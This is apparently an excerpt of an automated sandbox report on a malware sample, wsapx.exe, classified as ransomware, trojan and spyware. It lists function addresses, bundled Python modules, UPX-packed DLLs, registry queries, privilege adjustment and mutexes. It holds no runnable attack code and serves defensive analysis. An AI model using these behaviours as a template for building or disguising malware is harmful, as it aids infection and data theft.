              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947525F02_2_00007FFD947525F0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947746102_2_00007FFD94774610
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD9476F5702_2_00007FFD9476F570
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD9478D7002_2_00007FFD9478D700
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD9476C7202_2_00007FFD9476C720
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD9479D6A02_2_00007FFD9479D6A0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD9477A6B52_2_00007FFD9477A6B5
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947D46C02_2_00007FFD947D46C0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947FF8402_2_00007FFD947FF840
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947428502_2_00007FFD94742850
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947558502_2_00007FFD94755850
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947A87702_2_00007FFD947A8770
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947987A02_2_00007FFD947987A0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947440F02_2_00007FFD947440F0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947511202_2_00007FFD94751120
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947570C02_2_00007FFD947570C0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947A40D02_2_00007FFD947A40D0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947E12502_2_00007FFD947E1250
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD9475C1C02_2_00007FFD9475C1C0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD9475B3102_2_00007FFD9475B310
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947B43102_2_00007FFD947B4310
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947662C02_2_00007FFD947662C0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947652D02_2_00007FFD947652D0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD9476D3F02_2_00007FFD9476D3F0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947C73F02_2_00007FFD947C73F0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947464002_2_00007FFD94746400
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947EE4302_2_00007FFD947EE430
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947C84302_2_00007FFD947C8430
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947AF3602_2_00007FFD947AF360
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947833702_2_00007FFD94783370
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947443902_2_00007FFD94744390
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94762D202_2_00007FFD94762D20
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94746D422_2_00007FFD94746D42
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94767C902_2_00007FFD94767C90
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94743CA02_2_00007FFD94743CA0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94799CD02_2_00007FFD94799CD0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94798DF02_2_00007FFD94798DF0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94787E102_2_00007FFD94787E10
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD9474FD602_2_00007FFD9474FD60
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94748F102_2_00007FFD94748F10
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD9476BF402_2_00007FFD9476BF40
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947ADE702_2_00007FFD947ADE70
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD32435B6811_2_00007FFD32435B68
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD32435BFA11_2_00007FFD32435BFA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD324360C511_2_00007FFD324360C5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 65_2_00007FFD324453F265_2_00007FFD324453F2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 65_2_00007FFD325117DE65_2_00007FFD325117DE
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5EAE10110_2_00007FF60E5EAE10
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5CABA0110_2_00007FF60E5CABA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5D0A2C110_2_00007FF60E5D0A2C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5F7B24110_2_00007FF60E5F7B24
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5C1884110_2_00007FF60E5C1884
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5CB540110_2_00007FF60E5CB540
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5D54C0110_2_00007FF60E5D54C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5D1180110_2_00007FF60E5D1180
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5C82F0110_2_00007FF60E5C82F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E62AF90110_2_00007FF60E62AF90
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5F5F4C110_2_00007FF60E5F5F4C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5D3030110_2_00007FF60E5D3030
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5FC00C110_2_00007FF60E5FC00C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E62DFD8110_2_00007FF60E62DFD8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E604FE8110_2_00007FF60E604FE8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5EC05C110_2_00007FF60E5EC05C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5F0074110_2_00007FF60E5F0074
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5F8040110_2_00007FF60E5F8040
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5E0104110_2_00007FF60E5E0104
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E6200F0110_2_00007FF60E6200F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E609D74110_2_00007FF60E609D74
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5D1E04110_2_00007FF60E5D1E04
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5CEE08110_2_00007FF60E5CEE08
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E611DCC110_2_00007FF60E611DCC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E60EEA4110_2_00007FF60E60EEA4
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5CCE84110_2_00007FF60E5CCE84
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E61FE74110_2_00007FF60E61FE74
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5D8E68110_2_00007FF60E5D8E68
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E60AE50110_2_00007FF60E60AE50
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5C9EFC110_2_00007FF60E5C9EFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5FAF0C110_2_00007FF60E5FAF0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E619B98110_2_00007FF60E619B98
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E604B38110_2_00007FF60E604B38
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5D8C30110_2_00007FF60E5D8C30
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E605C8C110_2_00007FF60E605C8C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5F0D20110_2_00007FF60E5F0D20
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5CDD04110_2_00007FF60E5CDD04
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E616D0C110_2_00007FF60E616D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5E9D0C110_2_00007FF60E5E9D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5ED97C110_2_00007FF60E5ED97C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E6069FD110_2_00007FF60E6069FD
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5C49B8110_2_00007FF60E5C49B8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E605A70110_2_00007FF60E605A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5FFA6C110_2_00007FF60E5FFA6C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5CCB14110_2_00007FF60E5CCB14
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E62AAC0110_2_00007FF60E62AAC0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5E67E0110_2_00007FF60E5E67E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5D17C8110_2_00007FF60E5D17C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E6118A8110_2_00007FF60E6118A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5C8884110_2_00007FF60E5C8884
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5D2890110_2_00007FF60E5D2890
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5FD91C110_2_00007FF60E5FD91C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5F0904110_2_00007FF60E5F0904
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E60190C110_2_00007FF60E60190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5F38E8110_2_00007FF60E5F38E8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5FF59C110_2_00007FF60E5FF59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5D8598110_2_00007FF60E5D8598
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5EF5B0110_2_00007FF60E5EF5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E61260C110_2_00007FF60E61260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5F65FC110_2_00007FF60E5F65FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E617660110_2_00007FF60E617660
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E602700110_2_00007FF60E602700
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5FA710110_2_00007FF60E5FA710
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E600710110_2_00007FF60E600710
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5D86C4110_2_00007FF60E5D86C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E6286D4110_2_00007FF60E6286D4
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5D2360110_2_00007FF60E5D2360
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5F0374110_2_00007FF60E5F0374
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5EC3E0110_2_00007FF60E5EC3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5ED458110_2_00007FF60E5ED458
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E605468110_2_00007FF60E605468
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5CA504110_2_00007FF60E5CA504
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E602164110_2_00007FF60E602164
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5DE21C110_2_00007FF60E5DE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E6081CC110_2_00007FF60E6081CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E6241CC110_2_00007FF60E6241CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E6002A4110_2_00007FF60E6002A4
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E612268110_2_00007FF60E612268
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5E7244110_2_00007FF60E5E7244
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5CF24C110_2_00007FF60E5CF24C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E61832C110_2_00007FF60E61832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E611314110_2_00007FF60E611314
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5C42E0110_2_00007FF60E5C42E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5DD2C0110_2_00007FF60E5DD2C0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: String function: 00007FFD94749D60 appears 115 times
              Source: C:\Users\user\Desktop\wsapx.exeCode function: String function: 00007FFD94748E10 appears 90 times
              Source: C:\Users\user\Desktop\wsapx.exeCode function: String function: 00007FF7C71B2910 appears 34 times
              Source: C:\Users\user\Desktop\wsapx.exeCode function: String function: 00007FF7C71B2710 appears 104 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: String function: 00007FF60E5D8444 appears 48 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: String function: 00007FF60E6049F4 appears 53 times
              Source: wsapx.exeStatic PE information: invalid certificate
              Source: wsapx.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: rar.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: wsapx.exeBinary or memory string: OriginalFilename vs wsapx.exe
              Source: wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs wsapx.exe
              Source: wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs wsapx.exe
              Source: wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs wsapx.exe
              Source: wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs wsapx.exe
              Source: wsapx.exe, 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewsmprovhost.exej% vs wsapx.exe
              Source: wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs wsapx.exe
              Source: wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs wsapx.exe
              Source: wsapx.exe, 00000000.00000003.2148160549.0000015A08630000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs wsapx.exe
              Source: wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs wsapx.exe
              Source: wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs wsapx.exe
              Source: wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs wsapx.exe
              Source: wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs wsapx.exe
              Source: wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs wsapx.exe
              Source: wsapx.exe, 00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs wsapx.exe
              Source: wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs wsapx.exe
              Source: wsapx.exeBinary or memory string: OriginalFilename vs wsapx.exe
              Source: wsapx.exe, 00000002.00000002.2671685679.00007FFDA4DAC000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs wsapx.exe
              Source: wsapx.exe, 00000002.00000002.2673128851.00007FFDAC077000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs wsapx.exe
              Source: wsapx.exe, 00000002.00000002.2670503154.00007FFDA3443000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs wsapx.exe
              Source: wsapx.exe, 00000002.00000002.2668723386.00007FFD94492000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython312.dll. vs wsapx.exe
              Source: wsapx.exe, 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs wsapx.exe
              Source: wsapx.exe, 00000002.00000000.2153729398.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewsmprovhost.exej% vs wsapx.exe
              Source: wsapx.exe, 00000002.00000002.2672140543.00007FFDA549C000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs wsapx.exe
              Source: wsapx.exe, 00000002.00000002.2672409871.00007FFDA5804000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs wsapx.exe
              Source: wsapx.exe, 00000002.00000002.2670756568.00007FFDA347C000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs wsapx.exe
              Source: wsapx.exe, 00000002.00000002.2671280384.00007FFDA4348000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs wsapx.exe
              Source: wsapx.exe, 00000002.00000002.2667660778.00007FFD93D99000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs wsapx.exe
              Source: wsapx.exe, 00000002.00000002.2671488021.00007FFDA46E8000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs wsapx.exe
              Source: wsapx.exe, 00000002.00000002.2670016221.00007FFDA33D8000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilenamelibsslH vs wsapx.exe
              Source: wsapx.exe, 00000002.00000002.2669284338.00007FFD9473A000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs wsapx.exe
              Source: wsapx.exe, 00000002.00000002.2670276595.00007FFDA3412000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs wsapx.exe
              Source: wsapx.exe, 00000002.00000002.2671003578.00007FFDA34E4000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs wsapx.exe
              Source: wsapx.exeBinary or memory string: OriginalFilenamewsmprovhost.exej% vs wsapx.exe
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: Commandline size = 3647Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: libcrypto-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9989650991958289
              Source: libssl-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9923451741536459
              Source: python312.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9994210643762751
              Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9971739243943192
              Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9942978533094812
              Source: classification engineClassification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@177/56@4/3
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5DCAFC GetLastError,FormatMessageW,110_2_00007FF60E5DCAFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5DEF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,110_2_00007FF60E5DEF50
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E60B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,110_2_00007FF60E60B57C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5E3144 GetDiskFreeSpaceExW,110_2_00007FF60E5E3144
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1824:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5716:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2132:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8084:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6840:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3768:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6996:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7424:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7656:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
              Source: C:\Users\user\Desktop\wsapx.exeMutant created: \Sessions\1\BaseNamedObjects\x
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03
